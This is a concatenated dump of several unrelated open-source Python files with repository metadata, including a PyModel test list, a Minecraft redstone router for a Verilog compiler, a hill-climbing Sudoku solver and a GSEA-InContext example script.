"code_type": "caffe.PriorBoxParameter.CENTER_SIZE",
"confidence_threshold": "0.01", "keep_top_k": -1,
"nms_threshold": "0.5", "num_classes": "21",
"share_location": "1", "top_k": -1,
"variance_encoded_in_target": 0},
'node_4': {'shape': np.array([1, 1, 69856, 7])},
})
multi_box_detection_node = Node(graph, 'detection_output_1')
self.assertIsNone(multi_box_detection_infer(multi_box_detection_node))
| 56.115385
| 104
| 0.537903
|
8621222cce83ccae2b5fe5d557b5c9ece5f258f8
| 604
|
py
|
Python
|
samples/abp/test_graphics.py
|
jproudlo/PyModel
|
2ab0e2cf821807206725adaa425409b0c28929b7
|
[
"BSD-3-Clause"
] | 61
|
2015-01-29T16:18:51.000Z
|
2021-09-28T10:14:02.000Z
|
samples/abp/test_graphics.py
|
vikstr/PyModel
|
4fff616fe0fd8342c91a42d9db5d4097a179dff8
|
[
"BSD-3-Clause"
] | 2
|
2015-02-04T11:57:53.000Z
|
2021-07-18T20:59:55.000Z
|
samples/abp/test_graphics.py
|
vikstr/PyModel
|
4fff616fe0fd8342c91a42d9db5d4097a179dff8
|
[
"BSD-3-Clause"
] | 34
|
2015-02-04T12:00:29.000Z
|
2022-03-14T07:41:25.000Z
|
"""
ABP analyzer and graphics tests
"""
cases = [
('Run Pymodel Graphics to generate dot file from FSM model, no need use pma',
'pmg ABP'),
('Generate SVG file from dot',
'dotsvg ABP'),
# Now display ABP.dot in browser
('Run PyModel Analyzer to generate FSM from original FSM, should be the same',
'pma ABP'),
('Run PyModel Graphics to generate a file of graphics commands from new FSM',
'pmg ABPFSM'),
('Generate an svg file from the graphics commands',
'dotsvg ABPFSM'),
# Now display ABPFSM.svg in browser, should look the same as ABP.svg
]
| 24.16
| 82
| 0.653974
|
fbe80abb91241ecbc4880e675c8dab97acd79f15
| 13,360
|
py
|
Python
|
compiler/router.py
|
PietPtr/verilog2minecraft
|
911a4e35df80c340747bbc7b53019a90cbac9e3b
|
[
"MIT"
] | null | null | null |
compiler/router.py
|
PietPtr/verilog2minecraft
|
911a4e35df80c340747bbc7b53019a90cbac9e3b
|
[
"MIT"
] | null | null | null |
compiler/router.py
|
PietPtr/verilog2minecraft
|
911a4e35df80c340747bbc7b53019a90cbac9e3b
|
[
"MIT"
] | null | null | null |
import random
import time
from itertools import product
from typing import List, Tuple, Set, Dict, Any, NamedTuple, Optional
from enum import Enum
from amulet import Block
from amulet_nbt import TAG_String
from compiler.graph import Cell
from util.coord import tupleAdd, tupleSub
import heapq
from util.wool import WoolType
FOUR_DIRECTIONS = [(1, 0, 0), (-1, 0, 0), (0, 0, 1), (0, 0, -1)]
ALL_DIRECTIONS = [(x, y + a, z) for x, y, z in FOUR_DIRECTIONS for a in range(-1, 2)]
BOUNDING_DIRECTIONS = list(product(range(-1, 2), range(-2, 3), range(-1, 2)))
class BlockType(Enum):
STONE = "stone"
REDSTONE = "redstone_wire"
REPEATER = "repeater"
GLASS = "glass"
def to_minecraft(self) -> Block:
return Block('minecraft', self.value)
class RoutingBlock:
block_type: BlockType
properties: Dict[str, TAG_String]
def __init__(self, block_type: BlockType, direction: Tuple[Tuple[int, int, int], Tuple[int, int, int]] = None):
self.block_type = block_type
self.properties = dict()
if direction:
self.set_orientation(direction[0], direction[1])
def to_minecraft(self) -> Block:
return Block('minecraft', self.block_type.value, properties=self.properties)
def set_orientation(self, prev: Tuple[int, int, int], this: Tuple[int, int, int]):
delta = tupleSub(this, prev)
if delta == (0, 0, 1):
self.properties['facing'] = TAG_String('north')
elif delta == (0, 0, -1):
self.properties['facing'] = TAG_String('south')
elif delta == (1, 0, 0):
self.properties['facing'] = TAG_String('west')
elif delta == (-1, 0, 0):
self.properties['facing'] = TAG_String('east')
def __str__(self):
return f'RoutingBlock({self.block_type.value})'
def __repr__(self):
return str(self)
class RouteNode(NamedTuple):
point: Tuple[int, int, int]
previous: Optional['RouteNode']
length: int
last_straight: int
def visited_points(self, steps=6) -> Set[Tuple[int, int, int]]:
n = self
result = set()
while n is not None:
result.add(n.point)
n = n.previous
if len(result) >= steps:
return result
return result
class NoRouteFoundException(Exception):
collision: Set[Tuple[int, int, int]]
could_not_expand: Set[Tuple[int, int, int]]
start_dist: int
end_dist: int
def __init__(self, collision_output: Set[Tuple[int, int, int]], start_dist: int, end_dist: int, could_not_expand: Set[Tuple[int, int, int]], msg: str):
self.collision = collision_output
self.start_dist = start_dist
self.end_dist = end_dist
self.could_not_expand = could_not_expand
super(NoRouteFoundException, self).__init__(msg)
class Router:
bounding_box: Set[Tuple[int, int, int]]
bounding_box_static: Set[Tuple[int, int, int]]
bounding_box_route: Dict[Tuple[int, int, int], Set[Tuple[int, int, int]]]
all_routes: Dict[Tuple[int, int, int], List[Tuple[RoutingBlock, Tuple[int, int, int]]]]
blocks_to_route_starts: Dict[Tuple[int, int, int], Set[Tuple[int, int, int]]]
network: Dict[Tuple[int, int, int], List[Tuple[int, int, int]]]
iterations: int
def __init__(self, network: Dict[Tuple[int, int, int], List[Tuple[int, int, int]]], static_bounding_box: Set[Tuple[int, int, int]]):
self.bounding_box = set()
self.bounding_box_static = static_bounding_box
self.all_routes = dict()
self.bounding_box_route = dict()
self.blocks_to_route_starts = dict()
self.network = network
self.connection_points = set()
for endpoints in self.network.values():
self.connection_points.update(endpoints)
for startpoints in self.network.keys():
self.connection_points.add(startpoints)
self.recompute_bounding_box()
def _manhattan(self, a: Tuple[int, int, int], b: Tuple[int, int, int]):
return abs(a[0]-b[0]) + abs(a[1] - b[1]) + abs(a[2] - b[2])
def _find_route(self, original_start: Tuple[int, int, int], start: Tuple[int, int, int], end: Tuple[int, int, int],
maxQ: int, max_depth: int = None, max_counter: int = 100, is_revese: bool = False) -> RouteNode:
Q = []
self.iterations = 0
last_repeater = 7 if start == original_start else 15
heapq.heappush(Q, (self._manhattan(start, end), 0, RouteNode(start, None, 0, last_repeater)))
best = self._manhattan(start, end)
visited = set()
collision_output: Optional[List[Tuple[int, int, int]]] = None
collision_dist: int = self._manhattan(start, end) + 100
last_distance = self._manhattan(start, end)
start_distance = self._manhattan(start, end)
could_not_expand = set()
counter = 0
while 0 < len(Q) < maxQ and counter <= max_counter:
self.iterations += 1
heuristic, unused, node = heapq.heappop(Q)
if node.point == end:
return node
current_dist = self._manhattan(node.point, end)
if max_depth and start_distance - current_dist >= max_depth:
return node
if current_dist < best:
best = current_dist
counter = 0
if last_distance <= current_dist:
counter += 1
last_distance = current_dist
previous_points = node.visited_points().union({end})
random.shuffle(ALL_DIRECTIONS)
directions = ALL_DIRECTIONS
if node.last_straight >= 15:
newx, _, newz = tupleSub(node.point, node.previous.point)
directions = [(newx, 0, newz)]
for x, y, z in directions:
pos = tupleAdd((x, y, z), node.point)
positions_to_check = {pos, tupleAdd(pos, (0, 1, 0)), tupleAdd(pos, (0, -1, 0))}
own_bounding = set([tupleAdd(pos, offset) for offset in BOUNDING_DIRECTIONS])
dynamic_bounding_box_intersects = False
for pos_to_check in positions_to_check:
if self.blocks_to_route_starts.get(pos_to_check, set()) - {original_start} != set():
dynamic_bounding_box_intersects = True
dist = self._manhattan(pos_to_check, end)
if collision_output is None or dist < collision_dist:
collision_output = self.blocks_to_route_starts.get(pos_to_check, None)
collision_dist = dist
if pos != end and (
own_bounding.intersection(self.connection_points) - {start, end} != set() or
positions_to_check.intersection(previous_points) != set() or
tupleAdd(pos, (0, 2, 0)) in previous_points or
tupleAdd(pos, (0, -2, 0)) in previous_points or
positions_to_check.intersection(self.bounding_box_static) != set() or
dynamic_bounding_box_intersects
):
could_not_expand.add(pos)
continue
if pos in visited:
continue
visited.add(pos)
# if self._manhattan(pos, end) <= 2:
# print(f'Adding {pos} with distance {self._manhattan(pos, end)}')
last_straight = node.last_straight + 1
delta = tupleSub(pos, node.point)
if node.previous and tupleSub(node.point, node.previous.point) == delta and delta[1] == 0 and delta.count(0) == 2:
last_straight = 1
heapq.heappush(Q, (self._manhattan(pos, end), node.length + 1, RouteNode(pos, node, node.length + 1, last_straight)))
raise NoRouteFoundException(collision_output.copy() if collision_output else None, self._manhattan(start, end), best, could_not_expand,
f'Could not find route between {start} and {end}. Closest: {best}, start: {self._manhattan(start, end)}')
def recompute_bounding_box(self):
self.bounding_box.clear()
self.bounding_box.update(self.bounding_box_static)
for bb in self.bounding_box_route.values():
self.bounding_box.update(bb)
def remove_route(self, route_start: Tuple[int, int, int]):
routes = self.all_routes[route_start]
for block, pos in routes:
if block.block_type in (BlockType.REDSTONE, BlockType.REPEATER):
for offset in BOUNDING_DIRECTIONS:
bounding_pos = tupleAdd(pos, offset)
try:
self.blocks_to_route_starts[bounding_pos].remove(route_start)
except KeyError:
pass
del self.bounding_box_route[route_start]
del self.all_routes[route_start]
self.recompute_bounding_box()
def make_route(self, start: Tuple[int, int, int], end: Tuple[int, int, int], max_counter: int):
best_pos, best = start, self._manhattan(start, end)
last_pos = start
if start in self.all_routes:
for block, pos in self.all_routes[start]:
if block != BlockType.REDSTONE or tupleSub(pos, last_pos)[1] != 0:
last_pos = pos
continue
last_pos = pos
score = self._manhattan(pos, end)
if score < best:
best_pos, best = pos, score
print(f"Starting route from {best_pos}({start})->{end}")
try:
tmp_node = self._find_route(end, end, best_pos, 150, max_depth=4, max_counter=25, is_revese=True)
except NoRouteFoundException as e:
if e.start_dist - e.end_dist <= 4:
print('Finding reverse route failed! Throwing exception')
raise e
node = self._find_route(start, best_pos, end, 100000, max_counter=max_counter)
print(f"found route from {best_pos}({start})->{end} in {self.iterations} iterations")
result = []
if start not in self.bounding_box_route:
self.bounding_box_route[start] = set()
last_possible: Tuple[int, Tuple[int, int, int]] = None
last_repeated: int = 5
ordered_nodes: List[RouteNode] = []
while node is not None:
ordered_nodes.append(node)
node = node.previous
ordered_nodes = list(reversed(ordered_nodes))
for idx, node in enumerate(ordered_nodes):
wool_idx = sum(start)
if idx+1 < len(ordered_nodes) and ordered_nodes[idx+1].last_straight == 1:
last_possible = (len(result) + 1, node.point)
result.append((RoutingBlock(WoolType.num_to_wool(wool_idx)), (node.point[0], node.point[1] - 1, node.point[2])))
result.append((RoutingBlock(BlockType.REDSTONE), (node.point[0], node.point[1], node.point[2])))
if last_repeated >= 15:
prev = result[last_possible[0]-2][1]
result[last_possible[0]] = (RoutingBlock(BlockType.REPEATER, (prev, last_possible[1])), last_possible[1])
last_repeated = (len(result) - last_possible[0])//2 - 1
last_repeated += 1
for x, y, z in BOUNDING_DIRECTIONS:
pos = tupleAdd((x, y, z), node.point)
self.bounding_box.add(pos)
self.bounding_box_route[start].add(pos)
if pos not in self.blocks_to_route_starts:
self.blocks_to_route_starts[pos] = set()
self.blocks_to_route_starts[pos].add(start)
if start not in self.all_routes:
self.all_routes[start] = []
self.all_routes[start].extend(result)
def get_all_blocks(self) -> List[Tuple[RoutingBlock, Tuple[int, int, int]]]:
result = []
for route in self.all_routes.values():
result.extend(route)
return result
router = None
def create_routes(network: Dict[Tuple[int, int, int], List[Tuple[int, int, int]]],
component_bounding_box: Set[Tuple[int, int, int]]) -> List[Tuple[RoutingBlock, Tuple[int, int, int]]]:
global router
router = Router(network, component_bounding_box)
todo = [start for start in network.keys()]
base = 1
while len(todo) > 0:
print(f'Todo size: {len(todo)}')
start = todo.pop(0)
tries = 0
for end in network[start]:
print(f'Routing {start} -> {end}')
while True:
try:
router.make_route(start, end, min(500 + 1000*tries, 7500))
break
except NoRouteFoundException as e:
print(e)
tries += 1
base += 1
if e.collision is None:
continue
for collision_start in e.collision:
print(f"Removing routes from point: {collision_start}")
router.remove_route(collision_start)
todo.append(collision_start)
random.shuffle(todo)
return router.get_all_blocks()
| 42.278481
| 155
| 0.586527
|
eef38bea3443926d8d425f77554280cd099d424e
| 21,360
|
py
|
Python
|
MesSudokus/SudokuHillClimbing4.py
|
rubenbuelvas/IFT3335-TP1
|
f7de85e9fecfa55946f996616a9f7043cc182a1b
|
[
"MIT"
] | null | null | null |
MesSudokus/SudokuHillClimbing4.py
|
rubenbuelvas/IFT3335-TP1
|
f7de85e9fecfa55946f996616a9f7043cc182a1b
|
[
"MIT"
] | null | null | null |
MesSudokus/SudokuHillClimbing4.py
|
rubenbuelvas/IFT3335-TP1
|
f7de85e9fecfa55946f996616a9f7043cc182a1b
|
[
"MIT"
] | 1
|
2021-03-02T22:43:31.000Z
|
2021-03-02T22:43:31.000Z
|
# Hill climing approach to solve a sudoku puzzle
# Inspired by Stochastic search / optimization methods from https://en.wikipedia.org/wiki/Sudoku_solving_algorithms
## Initial code copied from http://norvig.com/sudoku.html
# Will work mostly with grid_values instead of values used in the Norvig sudoku.py (no possible values)
## Throughout this program we have:
## r is a row, e.g. 'A'
## c is a column, e.g. '3'
## s is a square, e.g. 'A3'
## d is a digit, e.g. '9'
## u is a unit, e.g. ['A1','B1','C1','D1','E1','F1','G1','H1','I1'] # unit_type can be 'row', 'column', or 'unit3x3'
## grid is a grid,e.g. 81 non-blank chars, e.g. starting with '.18...7...
## gv = grid_values is a dict of {square: char} with '0' or '.' for empties."""
def cross(A, B):
"Cross product of elements in A and elements in B."
return [a + b for a in A for b in B]
digits = '123456789'
rows = 'ABCDEFGHI'
cols = digits
squares = cross(rows, cols)
unitlist = ([cross(rows, c) for c in cols] +
[cross(r, cols) for r in rows] +
[cross(rs, cs) for rs in ('ABC', 'DEF', 'GHI') for cs in ('123', '456', '789')])
units = dict((s, [u for u in unitlist if s in u])
for s in squares)
peers = dict((s, set(sum(units[s], [])) - set([s]))
for s in squares)
# new variables created
firstsquaresofunit3x3 = cross('ADG', '147') # list containing 9 squares: first per unit: ['A1', 'A4', 'A7', 'D1', ...
searchMethods = {'Brute Force', 'Norvig Heuristic', 'Norvig Improved', 'Hill Climbing'}
emptydigits = '0.' # The digit values representing an empty square
unit_types = ['row', 'column', 'unit3x3'] # unit_type can be 'row', 'column', or 'unit3x3'
print_display = 'nothing' # Values: ["nothing", "minimum", "init grid", "init and final grids", "all solution grids"]
# Text color management
from colorama import Fore, Back, Style # example: print(Fore.BLUE + displaystring)
################ Unit Tests ################
def test():
"A set of tests that must pass."
assert len(squares) == 81
assert len(unitlist) == 27
assert all(len(units[s]) == 3 for s in squares)
assert all(len(peers[s]) == 20 for s in squares)
assert units['C2'] == [['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2', 'H2', 'I2'],
['C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9'],
['A1', 'A2', 'A3', 'B1', 'B2', 'B3', 'C1', 'C2', 'C3']]
assert peers['C2'] == {'A2', 'B2', 'D2', 'E2', 'F2', 'G2', 'H2', 'I2', 'C1', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8',
'C9', 'A1', 'A3', 'B1', 'B3'}
print('All tests pass.')
################ Parse a Grid ################
def grid_values(grid):
"""Convert grid into a dict of {square: char} with '0' or '.' for empties."""
# Example: {'A1': '4', 'A2': '.', 'A3': '.', 'A4': '.', 'A5': '.', 'A6': '.', 'A7': '8', 'A8': '.', 'A9': ...
chars = [c for c in grid if c in digits or c in '0.']
assert len(chars) == 81
return dict(zip(squares, chars))
################ Constraint functions ################
def squares_causing_max_conflicts(gv_init, gv_current, conflicts_grid_values):
"""Will receive a grid filled with values and a conflicts_grid_values and will return:
- a set of all squares having the maximum number of conflits
- the number of conflicts (int) for this maximum"""
maxconflicts = max(conflicts_grid_values)
return conflicts_grid_values[maxconflicts], maxconflicts
def is_initial_squares(gv_init, s):
"""Will receive the initial grid and a square and return True if filled in the initial puzzle"""
# loop trough all squares and list unempty squares (initial puzzle)
return gv_init[s] not in emptydigits
def non_initial_squares_set(gv_init):
"""Will return a set of the squares that were empty in the original puzzle"""
# return {r+c for r in rows for c in cols if is_initial_squares(gv_init, r+c)} #DGIMPROVE? Can write in one line?
set_of_squares = set()
for r in rows:
for c in cols:
if not is_initial_squares(gv_init, r + c):
set_of_squares.add(r + c)
return set_of_squares
def remove_initial_squares_from_set(gv_init, set_of_squares):
"""Will receive a set of squares and will return this set, without the initial squares"""
return set_of_squares - initial_squares_set(gv_init)
def squares_within_unit_list(s, unit_type):
"""Returns a list of the squares within the same unit as s.
unit_type can be 'row', 'column', or 'unit3x3' """
assert unit_type in unit_types
if unit_type == 'row':
return (units[s][0])
elif unit_type == 'column':
return (units[s][1])
elif unit_type == 'unit3x3':
return (units[s][2])
else:
raise ValueError(f"Unit type {unit_type} not implemented.")
def possible_replacements_within_unit(gv_init, s, unit_type):
"""Returns the squares within the same unit as s that can be replaced, excluding s.
unit_type can be 'row', 'column', or 'unit3x3' """
return (set(squares_within_unit_list(s, unit_type)) - set(s)) - initial_squares_set(gv_init)
def initial_squares_set(gv_init):
"""Will receive the initial grid and return a set of all squares not empty"""
# loop trough all squares and list unempty squares (initial puzzle)
set_initialsquares = set()
for r in rows:
for c in cols:
if is_initial_squares(gv_init, r + c):
set_initialsquares.add(r + c)
return set_initialsquares
# def swap2numbers(gv_init, gv_current, conflicts_grid_values):
# """Will take a square with a maximum number of conflicts and swap it randomly within the 3x3 unit with
# another square that isn't part of the initial puzzle. Will then return the new grid_value"""
#
# # Selects randomly one of the squares with the maximum number of conflicts
# s_withmaxconflicts, maxconflicts = squares_causing_max_conflicts(gv_init, gv_current, conflicts_grid_values)
# s1toswap = some(shuffled(s_withmaxconflicts)) # random selection
#
# # Find another square within 3x3 unit and swap randomly without considering the number of conflicts (TO IMPROVE?)
# s2toswap = some(shuffled(possible_replacements_within_unit(gv_init, s1toswap, 'unit3x3')))
# s1value = gv_current[s1toswap]
# gv_current[s1toswap] = gv_current[s2toswap]
# gv_current[s2toswap] = s1value
#
# if print_display != "nothing":
# print(f"Swapped {s1toswap }={gv_current[s1toswap]} and {s2toswap}={gv_current[s2toswap]} (values after the swap)")
#
# return gv_current
def fillgridrandomly(initialgridvalues):
"""Will return a new gridvalues with all empty squares filled randomly without putting the
same digit twice in a 3x3 unit."""
# Reminder: units['C2'] == [['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2', 'H2', 'I2'], #column
# ['C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9'], #line
# ['A1', 'A2', 'A3', 'B1', 'B2', 'B3', 'C1', 'C2', 'C3']] #unit 3x3
newgridvalues = initialgridvalues.copy() # dictionnary of initial values. Ex: {'A1': '4', 'A2': '.', 'A3': '.', ...
# Go through all 3x3 units and fill empty squares with random unused digits
for fsou in firstsquaresofunit3x3: # loop through the 9 units.
currentunit = units[fsou][2] # index 3 gives the 3x3 unit
# Loop trough all squares within a unit in order to extract initial squares with digits and digits used
listofsquareswithinitialvalue, listofsquareswithoutvalue, digitsused = [], [], ''
for s in currentunit: # loops trough the 9 values of the 3x3 unit
d = initialgridvalues[s]
if d in emptydigits: # no value
listofsquareswithoutvalue.append(s)
else:
listofsquareswithinitialvalue.append(s)
digitsused += d # capture all values from initial grid (cannot be replaced)
# Fill empty squares randomly
remainingdigits = list(shuffled(digits.translate({ord(c): '' for c in digitsused}))) # removes digits + shuffle
for s in listofsquareswithoutvalue:
newgridvalues[s] = remainingdigits.pop()
if len(remainingdigits) != 0:
raise ValueError(f"Programming error: remaining digits should be empty but contains: {remainingdigits}")
# print(f"digitsused={digitsused} - remainingdigits={remainingdigits} = newgridvalues={newgridvalues}")
return newgridvalues
def countconflicts(gv_init, gv_current):
"""Receives the initial grid and the current grid and returns a total evaluation of the
conflicts in the grid (sum of all conflicts)"""
tmp, total_conflicts, tmp = evalconflicts(gv_init, gv_current)
return total_conflicts
def is_solved(gv_init, gv_current):
"""Returns True is puzzle is solved and False otherwise"""
return countconflicts == 0
def evalconflicts(gv_init, gv_current):
"""Receives the initial grid and the current grid and returns:
- # A grid_values of conflicts (dict of {square: nb_of_conflits}
- A total evaluation of the conflicts in the grid (sum of all conflicts)
- A dictionary representing a list of squares (values) with the number of conflicts (int) as a key
Assumption: there are no conflicts in a 3x3 unit and there is a digit in each square"""
# Reminder: units['C2'] == [['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2', 'H2', 'I2'], #column
# ['C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9'], #line
# ['A1', 'A2', 'A3', 'B1', 'B2', 'B3', 'C1', 'C2', 'C3']] #unit 3x3
conflicts_grid_values = {} # A grid_values of conflicts (dict of {square: nb_of_conflits}
conflicts_dict = {} # A dictionary representing a list of squares (values) with the number of conflicts as a key
conflictvaluestotal = 0 # Evaluation of the conflicts in the grid
# Will loop through each square
for r in rows:
for c in cols:
conflictvalue = 0
if (gv_init[r + c] not in emptydigits) or (gv_current[r + c] in emptydigits):
conflictvalue = 0 # square filled in the initial puzzle or current grid with empty digits
# print(f"INITIAL r={r} c={c} gv_init[r+c]={gv_init[r+c]}")
else: # square randomly filled in the current grid
# Will calculate the number of conflict
u_column, u_line = units[r + c][0], units[r + c][1] # conflicts in column and conflicts in line
# print(f"CURRENT r={r} c={c}, u_column={u_column}")
for s in u_column:
if (s != r + c) and gv_current[s] == gv_current[r + c]: conflictvalue += 1
for s in u_line:
if (s != r + c) and gv_current[s] == gv_current[r + c]: conflictvalue += 1
# Update dictionaries
conflicts_grid_values[r + c] = conflictvalue # Put the value (int) of the conflict in grid_value
if not conflicts_dict.get(conflictvalue):
conflicts_dict[conflictvalue] = [] # List of squares (values) for this number of conflicts (key)
conflicts_dict[conflictvalue].append(r + c)
conflictvaluestotal += conflictvalue
return conflicts_grid_values, conflictvaluestotal, conflicts_dict
################ Display as 2-D grid ################
def displaygridv(gv_init, gv_current, showconflicts=True):
"""Display grid_values as a 2-D grid. If only display a initialgrid, you can pass currentgrid = initialgrid.
Same as displaygrid(), but used dictionnary gridvalues instead"""
width = 3 # No need to display the possible values
line = '+'.join(['-' * (width * 3)] * 3)
if showconflicts: # Will evaluate conflicts in order to show them
gv_conflicts, nb_conflicts, conflicts_grid_values = evalconflicts(gv_init,
gv_current) # Will initiale a grid_value containing number of conflicts
# Header of the grid
if showconflicts:
displaystring = '-------- VALUE GRID --------- --- CONFLICTS GRID (' + str(nb_conflicts).ljust(
3) + ') ----\n' # header
else:
displaystring = '-------- VALUE GRID ---------\n'
# Lines
for r in rows:
for c in cols: # Will print all digits of the current row (all columns)
# displays the value_grid
displaystring += (Back.BLACK if gv_init[
r + c] not in emptydigits else Style.RESET_ALL) # Will highlight numbers from initial grid emptydigits = '0.'
displaystring += ' ' + str(gv_current[r + c]) + ' '
displaystring += Style.RESET_ALL + ('|' if c in '36' else '') + (
'\n' if (c in '9') and (not showconflicts) else '') # separator after a group of 3 columns
if showconflicts: # displays the value_grid
displaystring += ' '
for c2 in cols:
displaystring += (Back.BLACK if gv_init[
r + c2] not in emptydigits else Style.RESET_ALL) # Will highlight numbers from initial grid emptydigits = '0.'
displaystring += ' ' + str(gv_conflicts[r + c2]) + ' '
displaystring += Style.RESET_ALL + ('|' if c2 in '36' else '') + (
'\n' if c2 in '9' else '') # Display for a column
if r in 'CF': displaystring = displaystring + line + (' ' + line if showconflicts else '') + '\n'
print(displaystring)
################ Search ################
def solve_grid_values(grid, searchMethod, printdisplay=False):
""" Will solve a puzzle with the appropriate search method"""
# Initializes a puzzle
gv_init = grid_values(grid)
gv_current = fillgridrandomly(gv_init) # Fills all the 3x3 units randomly with unused numbers in unit
if print_display in ["init grid", "init and final grids", "all solution grids"]:
displaygridv(gv_init, gv_current, True)
if searchMethod == 'Hill Climbing':
gv_new = improve_solution_hill_climb_calc_all_swaps3x3(gv_init, gv_current)
if print_display in ["init and final grids", "all solution grids"]: displaygridv(gv_init, gv_new)
else:
raise ValueError(f"Unknown search method {searchMethod}. Available search methods are {searchMethods}")
return gv_init, gv_new
def improve_solution_hill_climb_calc_all_swaps3x3(gv_init, gv_current):
"""Receives a puzzle with conflicts and tries to decrease the number of conflicts by swapping 2 values
using the Hill Climbing method.
Will calculate total conflict for all possible swaps of a pair within a 3x3 unit and then choose the best"""
# Create a list of swappable pairs (tuple) for each unit (not part of initial square)
all_swappables_squares = non_initial_squares_set(gv_init) # Will only consider non initial squares as swappable
set_of_swappable_pairs = set() # Example: {('A3', 'B1'), ('A3', 'B3'), ('A3', 'C3')...
for r in rows:
for c in cols:
if r + c in all_swappables_squares:
# Will loop for all combinations within units
possible_swaps = set(squares_within_unit_list(r + c, "unit3x3")) - {
r + c} # squares in unit, except current
possible_swaps = possible_swaps.intersection(all_swappables_squares) # only swappable squares
for s in possible_swaps:
# Will insert the pairs in a set, and the first element of the pair will always be the smallest.
if r + c < s:
set_of_swappable_pairs.add((r + c, s))
else:
set_of_swappable_pairs.add((s, r + c))
# Will simulate each swap, calculate the total conflicts for each swap and choose the best
best_puzzle = gv_current
current_total_conflicts = countconflicts(gv_init, gv_current)
best_total_conflicts = current_total_conflicts
while True: # Loop until a maximum is found
for pair in set_of_swappable_pairs:
test_puzzle = gv_current.copy()
test_puzzle[pair[0]], test_puzzle[pair[1]] = gv_current[pair[1]], gv_current[pair[0]] # swap the 2 values
if countconflicts(gv_init, test_puzzle) < best_total_conflicts: # found a better candidate
best_total_conflicts = countconflicts(gv_init, test_puzzle)
best_puzzle = test_puzzle
if best_total_conflicts == current_total_conflicts: # no improvement (local maximum or solution)
if print_display != 'nothing': print(
f"FINAL SOLUTION: found maximum with {best_total_conflicts} conflicts.")
return gv_current
else: # will try to improve
if print_display != 'nothing': print(f"Swapping{pair} and total conflicts is now {best_total_conflicts}")
if print_display == 'all solution grids': displaygridv(gv_init, best_puzzle)
gv_current = best_puzzle
current_total_conflicts = best_total_conflicts
################ Utilities ################
def some(seq):
"Return some element of seq that is true."
for e in seq:
if e: return e
return False
def from_file(filename, sep='\n'):
"Parse a file into a list of strings, separated by sep."
return open(filename).read().strip().split(sep)
def shuffled(seq):
"Return a randomly shuffled copy of the input sequence."
seq = list(seq)
random.shuffle(seq)
return seq
################ System test ################
import time, random
def solve_all(grids, name='', showif=0.0, searchMethod='ToSpecify'):
"""Attempt to solve a sequence of grids. Report results.
When showif is a number of seconds, display puzzles that take longer.
When showif is None, don't display any puzzles."""
def time_solve(grid):
# start = time.clock()
start = time.process_time()
if searchMethod == 'Hill Climbing':
gv_init, gv_current = solve_grid_values(grid, searchMethod)
else:
values = solve(grid, searchMethod)
t = time.process_time() - start
#
## Display puzzles that take long enough
if showif is not None and t > showif:
if searchMethod == 'Hill Climbing':
displaygridv(gv_init, gv_current)
else:
display(grid_values(grid))
if values: display(values)
print('(%.2f seconds)\n' % t)
if searchMethod == 'Hill Climbing':
return (t, is_solved(gv_init, gv_current))
else:
return (t, solved(values))
times, results = zip(*[time_solve(grid) for grid in grids])
N = len(grids)
# Will avoid division by zero if time is too short (0.0).
if sum(times) != 0.0:
hz = N / sum(times)
else:
hz = 999
if N >= 1:
print("Solved %d of %d %s puzzles in %.2f secs (avg %.2f secs (%d Hz), max %.2f secs). - %s" % (
sum(results), N, name, sum(times), sum(times) / N, hz, max(times), searchMethod))
def solved(values):
"A puzzle is solved if each unit is a permutation of the digits 1 to 9."
def unitsolved(unit): return set(values[s] for s in unit) == set(digits)
return values is not False and all(unitsolved(unit) for unit in unitlist)
################ Main routine ################
if __name__ == '__main__':
test()
# Demo one sudoku with display of each step
grid2 = '4.....8.5.3..........7......2.....6.....8.4......1.......6.3.7.5..2.....1.4......'
print_display_old = print_display
print_display = "all solution grids"
solve_grid_values(grid2, 'Hill Climbing')
print_display = print_display_old
# Test with different files
solve_all(from_file("1puzzle.txt"), "1puzzle", 9.0, 'Hill Climbing')
solve_all(from_file("easy50.txt"), "easy50 ", 9.0, 'Hill Climbing')
# solve_all(from_file("top95.txt"), "top95 ", 9.0, 'Hill Climbing')
# solve_all(from_file("hardest.txt"), "hardest", 9.0, 'Hill Climbing')
# solve_all(from_file("100sudoku.txt"), "100puz ", 9.0, 'Hill Climbing')
# solve_all(from_file("1000sudoku.txt"), "1000puz", 9.0, 'Hill Climbing')
# solve_all(from_file("NakedPair.txt"), "NakedPT", 9.0, 'Hill Climbing')
## References used:
## http://www.scanraid.com/BasicStrategies.htm
## http://www.sudokudragon.com/sudokustrategy.htm
## http://www.krazydad.com/blog/2005/09/29/an-index-of-sudoku-strategies/
## http://www2.warwick.ac.uk/fac/sci/moac/currentstudents/peter_cock/python/sudoku/
## https://www.sudokuoftheday.com/techniques/naked-pairs-triples/
| 48.545455
| 166
| 0.606554
|
b9dc9214f12464dc4c36c9d7c0f322f6c8f3f8d2
| 670
|
py
|
Python
|
run_example.py
|
CostelloLab/GSEA-InContext_noTk
|
ee1a845cc978cb0da8d296b51e3f36dc26234a63
|
[
"MIT"
] | null | null | null |
run_example.py
|
CostelloLab/GSEA-InContext_noTk
|
ee1a845cc978cb0da8d296b51e3f36dc26234a63
|
[
"MIT"
] | null | null | null |
run_example.py
|
CostelloLab/GSEA-InContext_noTk
|
ee1a845cc978cb0da8d296b51e3f36dc26234a63
|
[
"MIT"
] | null | null | null |
import gsea_incontext_notk
import sys, logging
rnk = "GSE4773_DEG_Expt1_Control_vs_Group1_gene.rnk"
# Run GSEA preranked - Hallmarks
#prerank_results = gsea_incontext_notk.prerank(
# rnk='data/rnk_lists/' + rnk,
# gene_sets='data/gene_sets/hallmarks.gmt',
# outdir='out/Prerank_Hallmarks/' + rnk[:-4],
# permutation_num=100,
# processes=4
#)
# Run GSEA-InContext - Hallmarks
gseapen_results = gsea_incontext_notk.incontext(
rnk='data/rnk_lists/' + rnk,
gene_sets='data/gene_sets/hallmarks.gmt',
background_rnks='data/bg_rnk_lists/all_442_lists_permuted_x100.csv',
outdir='out/InContext_Hallmarks/' + rnk[:-4],
permutation_num=100,
processes=4
)
print('Done!')
| 25.769231
| 69
| 0.768657
|
6732e29e140b176a2682f7332434edddea3153fa
| 34
|
py
|
Python
|
player/clues.py
|
